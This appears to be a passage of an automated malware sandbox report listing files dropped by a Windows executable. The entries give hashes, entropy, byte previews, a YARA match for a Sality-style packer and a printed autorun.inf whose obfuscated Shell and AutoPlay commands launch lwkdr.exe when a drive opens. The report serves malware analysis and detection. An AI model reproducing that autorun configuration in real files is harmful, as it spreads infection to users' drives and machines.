                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\winwrbrd.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\winwslkbc.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\winwtmo.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\winwtsh.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\winwufqv.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\winwukco.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\winxbag.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\winxixro.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\winxjcs.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\winxmkqo.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):82944
                                  Entropy (8bit):7.980431856779428
                                  Encrypted:false
                                  SSDEEP:1536:9Gq2mRNeHxNE8VGOE1xjGXXNyJUgcft45w6Olp9ryFONh8WOQPivgg7eV:cq9MHojOJ9Jl8vObxyFONS+iz72
                                  MD5:897A7E55A96EC2554B92B33629D4C23B
                                  SHA1:DE33D0FD1FDF368309E91BF146C54B11A8731AC0
                                  SHA-256:26C164ABE9DF5ED67EC1F2853E13C543136078B15EF081834FD27AB7F0E2C904
                                  SHA-512:B19D45007BCFF92CC4563D8C9F068E2681A7F885C0BF70A334A5A76FFCB037EB3907625937035463231C930D5A6058F5D48AE7A3A2B3D1E41DED0ADFC06A16B5
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\Users\user\AppData\Local\Temp\winxmkqo.exe, Author: ditekSHen
                                  Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................`..............................................`...<....................................................................................................................text....P.......B.................. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............[.....S.......f.....@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\winxuye.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\winykpyvx.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\winywost.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\xbjnq.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\xlxm.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\xnvniy.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\ybbqve.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\yxwrp.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Windows\appcompat\Programs\Amcache.hve

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.391151834321063
                                  Encrypted:false
                                  SSDEEP:6144:5l4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuN1xOBSqa:P4vF0MYQUMM6VFYLxU
                                  MD5:D2CC2CAF2C52B22A84753C3D19D7DA76
                                  SHA1:56D23BB2ED1CF817074CE049484AB27DB72A2E2D
                                  SHA-256:5C1C7DAB98E5625F4C964E49E7A5D4C0F0533F479D5CDD3E8E2E0D77FAF8C58A
                                  SHA-512:FB90C2CFBABA3D2885A89FABBB60A9C57A7BF61529438A80620C81193817BA23026E5FEB340758D35E55AEFBED64D9C9266208A076AF6E302769C3D850D08249
                                  Malicious:false
                                  Preview:regfG...G....\.Z.................... ....P......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..u..................................................................................................................................................................................................................................................................................................................................................+c.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Windows\system.ini

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:Windows SYSTEM.INI
                                  Category:dropped
                                  Size (bytes):255
                                  Entropy (8bit):5.274405989720487
                                  Encrypted:false
                                  SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtP4y:F4Yv7yk3OUBq82wqFtP4y
                                  MD5:FBE06591B91AFAF5DDB4A97A0FA14C7D
                                  SHA1:8AD8A0DD223A2BE8F031C4A49A149915E510981D
                                  SHA-256:C8C0763FCF7B25823CE17806B4CE10953AB15CA537E72D5659EECA0B901E0A11
                                  SHA-512:0D8F5EB3DE4B4032B0F2382CA550559BF178711A2F8FEA70BEC039E5C2A1496B1EA239268D1786B70245A319EAB9A596DAC2978677B57073E9543135DC2B1DB0
                                  Malicious:false
                                  Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=53263431135..

                                  C:\autorun.inf

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:Microsoft Windows Autorun file
                                  Category:dropped
                                  Size (bytes):312
                                  Entropy (8bit):5.585297651980641
                                  Encrypted:false
                                  SSDEEP:6:S3nFegfsd+bLSKCfVTwUnwNd7qvmNExPd/UEtNO0Vq9gCiPLO7Ny:ysg3v5OTwUnwNd7qaUPdlOyPy7Ny
                                  MD5:CB7505D71F2E1994B1DEF5AE1BA4E46A
                                  SHA1:07C351AEFA8AB42696654096FF25AC374F4FFFD6
                                  SHA-256:0D03D23296CEC0AF8BAE943BEBA4E4A9E63E43653CDCA3897FCC1ACB756DAE9F
                                  SHA-512:35707548F03ED6366F732930C509B9865160C962B1E96516104E5115685F70AE91E5259FFE8915E68C1114DAC0ABCC81E93ED79F3E43477FFC4F9C731EA80EBA
                                  Malicious:true
                                  Preview:[AutoRun]..;cJKyvnrixyhEhW AOxxM..Shell\opEn\DeFauLT=1..;UhPKXXoJTnOpphwSHETkxoeBfMswrcAIUkKfnsCqhgq dgAhq..shELL\ExpLorE\CoMmand = lwkdr.exe..;puVo ..oPEN=lwkdr.exe....;sgtiCsRMreXpNIxChbYSGFndJwDYS..ShELl\open\cOmMAnD =lwkdr.exe..;xXxfHmCCJyilgSWmjh sorIQLHLdJAGdC JYVesj..Shell\AutoPLay\commanD= lwkdr.exe..

                                  C:\lwkdr.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):103140
                                  Entropy (8bit):7.975490987238012
                                  Encrypted:false
                                  SSDEEP:3072:cq9MHojOJ9Jl8vObxyFONS+iz7z28ykVncm0:H9MHoS7lVIFuS+Y7C2ncm0
